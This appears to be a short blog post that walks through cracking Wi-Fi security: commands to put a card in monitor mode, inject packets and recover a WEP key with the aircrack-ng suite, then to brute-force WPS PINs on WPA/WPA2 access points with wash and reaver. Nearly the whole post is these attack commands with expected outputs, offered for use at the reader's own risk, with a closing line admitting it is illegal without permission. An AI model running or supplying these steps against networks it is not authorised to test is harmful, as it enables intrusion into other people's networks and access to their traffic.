WEP/WPA/WPA2 PSK Encryption
- Try it at your own Risk.-
Cracking WEP Encryption
# airmon-ng start wlan0
---> observe monitor mode enabled. may be mon0, mon1 or mon2 any.
# airodump-ng mon0
New Terminal (Note do not close previous terminals and keep them running)
# airodump-ng -c [Channel Number] --bssid [BSSID] -w wep mon0
New Terminal (aireplay command speeds up)
# aireplay-ng -1 0 -a [BSSID] mon0
---> Result should be Association successful
New Terminal
# aireplay-ng -3 -b [BSSID] mon0
New Terminal
# aircrack-ng wep-01.cap
---> After sufficient IVs your key found will be displayed in this file. (This process would take 10 to 20 minutes
but if two aireplay steps are skipped, it would take hours but still be cracked.)
Cracking WPA/WPA2 PSK Encryption
# airmon-ng start wlan0
# airodump-ng mon0
# wash -i mon0
---> To check which Access points are WPS locked and unlocked. Only unlocked ones can be cracked.
# reaver -i mon0 -c [Channel Number] -b [BSSID] -vv
---> First it should say Association successful and should start py trying pin no like 12345670, or else it would not be cracked.
It would take hours depending on the strength of the password and signal strength.
Both of the WEP and WPA2 PSK cracking steps has been tested in Backtrack 5 R3. WEP tested in Backtrack 5 R2 as well.
WPA2 PSK cracking success rate is not good in my case but certainly have succeeded once.
Note:
This is illegal and should not be tried without sufficient permissions. Try it at your own risk.
|
No comments:
Post a Comment